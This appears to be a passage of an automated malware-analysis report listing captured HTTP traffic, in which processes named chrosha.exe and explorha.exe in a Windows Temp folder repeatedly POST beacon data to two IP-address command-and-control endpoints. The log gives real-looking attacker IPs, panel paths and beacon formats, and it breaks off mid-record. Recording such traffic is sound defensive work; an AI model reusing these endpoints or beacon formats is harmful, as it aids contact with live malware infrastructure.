                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      719192.168.2.550566193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:16.909847021 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:17.152375937 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      720192.168.2.550567193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:17.177627087 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:17.433527946 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      721192.168.2.550568193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:17.406939983 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:17.662655115 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      722192.168.2.550569193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:17.787735939 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:18.031352997 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      723192.168.2.550570193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:18.027229071 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:18.274492979 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      724192.168.2.550571193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:18.278239012 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:18.521414042 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      725192.168.2.550572193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:18.531030893 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:18.785921097 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      726192.168.2.550573193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:18.879055977 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:19.121715069 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      727192.168.2.550574193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:19.150758982 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:19.400348902 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      728192.168.2.550575193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:19.369399071 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:19.617826939 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      729192.168.2.550576193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:19.655320883 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:19.907238007 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      730192.168.2.550577193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:19.983275890 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:20.232112885 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      731192.168.2.550578193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:20.273958921 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:20.519186974 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      732192.168.2.550579193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:20.479027033 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:20.726146936 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      733192.168.2.550580193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:20.772306919 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:21.024439096 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      734192.168.2.550581193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:21.088296890 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:21.334559917 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      735192.168.2.550582193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
